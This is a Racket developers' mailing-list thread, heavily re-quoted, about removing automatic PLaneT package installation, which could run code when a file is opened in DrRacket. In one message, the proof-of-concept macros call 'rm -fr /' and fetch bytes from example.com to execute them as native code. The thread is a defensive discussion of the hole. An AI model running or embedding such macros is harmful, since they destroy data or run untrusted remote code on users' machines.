Re: [racket-dev] [plt] Push #27862: master branch updated
Am I naive or isn't any download of any package opening the door to such tricks? On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote: On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote: If I have background expansion on, then when I open that file it installs the package. As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped. Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.] Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them. Jay Robby _ Racket Developers list: http://lists.racket-lang.org/dev _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
In short yes. But that short answer isn't where we should stop. :) Really, this is about a design decision that's different between planet and the package system: in planet, running a program was sufficient for installing packages. In the package system you have to take an explicit step to install the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his some macro tricks comment) but really what we're talking about is that design difference and UX issues. Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits. And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that. Make more sense? Robby On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen matth...@ccs.neu.eduwrote: Am I naive or isn't any download of any package opening the door to such tricks? On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote: On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote: If I have background expansion on, then when I open that file it installs the package. As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped. Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.] Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them. Jay Robby _ Racket Developers list: http://lists.racket-lang.org/dev _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
And similarly, the package system is a social curation system to monitor packages for good behavior, which planet does do (but could have and could now.) Jay On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler ro...@eecs.northwestern.edu wrote: In short yes. But that short answer isn't where we should stop. :) Really, this is about a design decision that's different between planet and the package system: in planet, running a program was sufficient for installing packages. In the package system you have to take an explicit step to install the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his some macro tricks comment) but really what we're talking about is that design difference and UX issues. Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits. And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that. Make more sense? Robby On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen matth...@ccs.neu.edu wrote: Am I naive or isn't any download of any package opening the door to such tricks? On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote: On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote: If I have background expansion on, then when I open that file it installs the package. As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped. Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.] Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them. Jay Robby _ Racket Developers list: http://lists.racket-lang.org/dev _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
Oh, yes. I meant to add this to my message. This is a bit part of why I think the package system is going to work well: there is now some movement in this good direction. (Jacob and Matthias and I had talked about social stuff in the context of planet a bunch, but a) didn't do enough and b) had a slightly different emphasis -- but b) probably would have changed if we'd dug into it.) Robby On Thu, Nov 28, 2013 at 8:57 AM, Jay McCarthy j...@racket-lang.org wrote: And similarly, the package system is a social curation system to monitor packages for good behavior, which planet does do (but could have and could now.) Jay On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler ro...@eecs.northwestern.edu wrote: In short yes. But that short answer isn't where we should stop. :) Really, this is about a design decision that's different between planet and the package system: in planet, running a program was sufficient for installing packages. In the package system you have to take an explicit step to install the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his some macro tricks comment) but really what we're talking about is that design difference and UX issues. Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits. And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that. Make more sense? Robby On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen matth...@ccs.neu.edu wrote: Am I naive or isn't any download of any package opening the door to such tricks? On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote: On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote: If I have background expansion on, then when I open that file it installs the package. As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped. Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.] Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them. Jay Robby _ Racket Developers list: http://lists.racket-lang.org/dev _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
There is an important change in this commit. Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket. Currently the error message suggests using raco planet but I think we need a bit of a GUI shim for other users. On Wed, Nov 27, 2013 at 3:40 PM, j...@racket-lang.org wrote: jay has updated `master' from 033065f632 to 60ae164d05. http://git.racket-lang.org/plt/033065f632..60ae164d05 =[ 6 Commits ]== Directory summary: 57.6% pkgs/plt-services/meta/pkg-index/official/static/ 17.6% pkgs/plt-services/meta/pkg-index/official/ 22.0% racket/collects/planet/private/ ~~ 2413278 Jay McCarthy j...@racket-lang.org 2013-11-27 14:51 : | moving delete button : M .../meta/pkg-index/official/static/index.html | 2 ++ M .../meta/pkg-index/official/static/index.js | 16 +--- M .../meta/pkg-index/official/static/style.css | 4 ~~ 113696c Jay McCarthy j...@racket-lang.org 2013-11-27 14:54 : | edit on lose focus : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- ~~ cf1755f Jay McCarthy j...@racket-lang.org 2013-11-27 15:19 : | Remove arbitrary code execution exploit from Racket and DrRacket | | This is particularly bad with DrRacket's online syntax checking, which | causes opening a file to download and executed aribtrary code. : M racket/collects/planet/private/resolver.rkt | 8 ~~ 98df30c Jay McCarthy j...@racket-lang.org 2013-11-27 15:30 : | deleting static s3 content properly : M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- ~~ 7b7a5ad Jay McCarthy j...@racket-lang.org 2013-11-27 15:33 : | increase pkg test timeout : M pkgs/plt-services/meta/props | 2 +- ~~ 60ae164 Jay McCarthy j...@racket-lang.org 2013-11-27 15:39 : | Removing add tag button when not logged in re mflatt : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 +-- M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- =[ Overall Diff ]=== pkgs/plt-services/meta/pkg-index/official/static.rkt --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt @@ -304,7 +304,16 @@ (cache /pkgs pkgs) (cache /pkgs-all pkgs-all) (for ([p (in-list pkg-list)]) -(cache (format /pkg/~a p) (format pkg/~a p +(cache (format /pkg/~a p) (format pkg/~a p))) + + (let () +(define pkg-path (build-path static-path pkg)) +(for ([f (in-list (directory-list pkg-path))] + #:unless (regexp-match #json$ (path-string f)) + #:unless (member (path-string f) pkg-list)) + (with-handlers ([exn:fail:filesystem? void]) +(delete-file (build-path pkg-path f)) +(delete-file (build-path pkg-path (path-add-suffix f #.json))) (module+ main (require racket/cmdline) pkgs/plt-services/meta/pkg-index/official/static/index.html ~~~ --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html @@ -54,12 +54,14 @@ trtdLast Edit:/tdtdspan id=pi_last_edit/span/td/tr trtdDescription:/tdtdspan id=pi_description/span/td/tr trtdTags:/tdtdspan id=pi_tags/span/td/tr -trtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr +tr id=pi_add_tag_rowtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr tr id=pi_versions_rowtdVersions Exceptions/tdtdtable id=pi_versions/table/td/tr tr id=pi_add_version_rowtd/tdtdlabelVersion:/label input type=text id=pi_add_version_text class=text ui-widget-content ui-corner-all /br /labelSource:/label input type=text id=pi_add_version_source_text class=text ui-widget-content ui-corner-all /button id=pi_add_version_buttonAdd Version Exception/button/td/tr tr id=pi_dependencies_rowtdDependencies/tdtdspan id=pi_dependencies/span/td/tr tr id=pi_conflicts_rowtdConflicts/tdtdspan id=pi_conflicts/span/td/tr trtdModules/tdtdspan id=pi_modules/span/td/tr +tr id=pi_delete_rowtd colspan=2button id=pi_delete_buttonDelete +Package/buttonbr /(there is no undo!)/td/tr /table div id=pi_install class=installInstall this package with:brbrttraco pkg install span id=pi_name_inst/span/ttbrbror, with the 'File|Install Package...' menu option in DrRacket./div
Re: [racket-dev] [plt] Push #27862: master branch updated
Can you demonstrate how to make this happen? Opening a file with these contents, for example, doesn't install anything. #lang racket (require (planet planet/test-connection:1:0/test-connection)) As for automatically executing arbitrary code, I think you must mean something more precise here. Perhaps code that hasn't already been explicitly installed? If that's what you mean, then I think I'm also missing how this happens. Robby On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy j...@racket-lang.org wrote: There is an important change in this commit. Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket. Currently the error message suggests using raco planet but I think we need a bit of a GUI shim for other users. On Wed, Nov 27, 2013 at 3:40 PM, j...@racket-lang.org wrote: jay has updated `master' from 033065f632 to 60ae164d05. http://git.racket-lang.org/plt/033065f632..60ae164d05 =[ 6 Commits ]== Directory summary: 57.6% pkgs/plt-services/meta/pkg-index/official/static/ 17.6% pkgs/plt-services/meta/pkg-index/official/ 22.0% racket/collects/planet/private/ ~~ 2413278 Jay McCarthy j...@racket-lang.org 2013-11-27 14:51 : | moving delete button : M .../meta/pkg-index/official/static/index.html | 2 ++ M .../meta/pkg-index/official/static/index.js | 16 +--- M .../meta/pkg-index/official/static/style.css | 4 ~~ 113696c Jay McCarthy j...@racket-lang.org 2013-11-27 14:54 : | edit on lose focus : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- ~~ cf1755f Jay McCarthy j...@racket-lang.org 2013-11-27 15:19 : | Remove arbitrary code execution exploit from Racket and DrRacket | | This is particularly bad with DrRacket's online syntax checking, which | causes opening a file to download and executed aribtrary code. : M racket/collects/planet/private/resolver.rkt | 8 ~~ 98df30c Jay McCarthy j...@racket-lang.org 2013-11-27 15:30 : | deleting static s3 content properly : M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- ~~ 7b7a5ad Jay McCarthy j...@racket-lang.org 2013-11-27 15:33 : | increase pkg test timeout : M pkgs/plt-services/meta/props | 2 +- ~~ 60ae164 Jay McCarthy j...@racket-lang.org 2013-11-27 15:39 : | Removing add tag button when not logged in re mflatt : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 +-- M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- =[ Overall Diff ]=== pkgs/plt-services/meta/pkg-index/official/static.rkt --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt @@ -304,7 +304,16 @@ (cache /pkgs pkgs) (cache /pkgs-all pkgs-all) (for ([p (in-list pkg-list)]) -(cache (format /pkg/~a p) (format pkg/~a p +(cache (format /pkg/~a p) (format pkg/~a p))) + + (let () +(define pkg-path (build-path static-path pkg)) +(for ([f (in-list (directory-list pkg-path))] + #:unless (regexp-match #json$ (path-string f)) + #:unless (member (path-string f) pkg-list)) + (with-handlers ([exn:fail:filesystem? void]) +(delete-file (build-path pkg-path f)) +(delete-file (build-path pkg-path (path-add-suffix f #.json))) (module+ main (require racket/cmdline) pkgs/plt-services/meta/pkg-index/official/static/index.html ~~~ --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html @@ -54,12 +54,14 @@ trtdLast Edit:/tdtdspan id=pi_last_edit/span/td/tr trtdDescription:/tdtdspan id=pi_description/span/td/tr trtdTags:/tdtdspan id=pi_tags/span/td/tr -trtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr +tr id=pi_add_tag_rowtd/tdtdinput type=text id=pi_add_tag_text class=text ui-widget-content ui-corner-all /button id=pi_add_tag_buttonAdd Tag/button/td/tr tr id=pi_versions_rowtdVersions Exceptions/tdtdtable id=pi_versions/table/td/tr tr id=pi_add_version_rowtd/tdtdlabelVersion:/label input type=text id=pi_add_version_text class=text ui-widget-content ui-corner-all /br /labelSource:/label input type=text id=pi_add_version_source_text class=text ui-widget-content ui-corner-all /button id=pi_add_version_buttonAdd Version
Re: [racket-dev] [plt] Push #27862: master branch updated
If I have background expansion on, then when I open that file it installs the package. Since once a Planet package is installed it is set up and compiled that means that this code: #lang racket (attack) (define-syntax (attack stx) (system rm -fr /)) is automatically run as soon as I open it up. Furthermore, I could do something like this: #lang racket (attack) (define-syntax (attack stx) (local-require (only-in '#%foreign ffi-call _int32) net/http-client) (define-values (s hs ip) (http-sendrecv example.com /)) (define bs (port-bytes ip)) (printf got: ~v\n bs) (define weird-c-code bs) ((ffi-call weird-c-code null _int32))) and really execute any C code that I could find on the Internet. This isn't just a DrRacket problem though. We should not be arbitrarily installing things on people's machines without their consent. This power is too much. The new system of suggesting an install or allowing an opt-in for certain vetted packages is much kinder. Jay On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler ro...@eecs.northwestern.edu wrote: Can you demonstrate how to make this happen? Opening a file with these contents, for example, doesn't install anything. #lang racket (require (planet planet/test-connection:1:0/test-connection)) As for automatically executing arbitrary code, I think you must mean something more precise here. Perhaps code that hasn't already been explicitly installed? If that's what you mean, then I think I'm also missing how this happens. Robby On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy j...@racket-lang.org wrote: There is an important change in this commit. Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket. Currently the error message suggests using raco planet but I think we need a bit of a GUI shim for other users. On Wed, Nov 27, 2013 at 3:40 PM, j...@racket-lang.org wrote: jay has updated `master' from 033065f632 to 60ae164d05. http://git.racket-lang.org/plt/033065f632..60ae164d05 =[ 6 Commits ]== Directory summary: 57.6% pkgs/plt-services/meta/pkg-index/official/static/ 17.6% pkgs/plt-services/meta/pkg-index/official/ 22.0% racket/collects/planet/private/ ~~ 2413278 Jay McCarthy j...@racket-lang.org 2013-11-27 14:51 : | moving delete button : M .../meta/pkg-index/official/static/index.html | 2 ++ M .../meta/pkg-index/official/static/index.js | 16 +--- M .../meta/pkg-index/official/static/style.css | 4 ~~ 113696c Jay McCarthy j...@racket-lang.org 2013-11-27 14:54 : | edit on lose focus : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- ~~ cf1755f Jay McCarthy j...@racket-lang.org 2013-11-27 15:19 : | Remove arbitrary code execution exploit from Racket and DrRacket | | This is particularly bad with DrRacket's online syntax checking, which | causes opening a file to download and executed aribtrary code. : M racket/collects/planet/private/resolver.rkt | 8 ~~ 98df30c Jay McCarthy j...@racket-lang.org 2013-11-27 15:30 : | deleting static s3 content properly : M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- ~~ 7b7a5ad Jay McCarthy j...@racket-lang.org 2013-11-27 15:33 : | increase pkg test timeout : M pkgs/plt-services/meta/props | 2 +- ~~ 60ae164 Jay McCarthy j...@racket-lang.org 2013-11-27 15:39 : | Removing add tag button when not logged in re mflatt : M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 +-- M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- =[ Overall Diff ]=== pkgs/plt-services/meta/pkg-index/official/static.rkt --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt @@ -304,7 +304,16 @@ (cache /pkgs pkgs) (cache /pkgs-all pkgs-all) (for ([p (in-list pkg-list)]) -(cache (format /pkg/~a p) (format pkg/~a p +(cache (format /pkg/~a p) (format pkg/~a p))) + + (let () +(define pkg-path (build-path static-path pkg)) +(for ([f (in-list (directory-list pkg-path))] + #:unless (regexp-match #json$ (path-string f)) + #:unless (member (path-string f) pkg-list)) + (with-handlers ([exn:fail:filesystem? void]) +(delete-file (build-path pkg-path f)) +(delete-file (build-path pkg-path (path-add-suffix f #.json))) (module+ main (require racket/cmdline) pkgs/plt-services/meta/pkg-index/official/static/index.html
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote: If I have background expansion on, then when I open that file it installs the package. As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? Robby _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler ro...@eecs.northwestern.edu wrote: On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy j...@racket-lang.org wrote: If I have background expansion on, then when I open that file it installs the package. As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the Can't download a Planet package error message as-if the install were stopped. Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, Check Syntax (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say Check Syntax should make no attempt to prevent package installation.] Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? I tried to install and fetch some packages. I see now that I committed in the racket/collects directory but the changes to make that work were in the pkgs/planet-pkgs directory so I stupidly missed them. Jay Robby _ Racket Developers list: http://lists.racket-lang.org/dev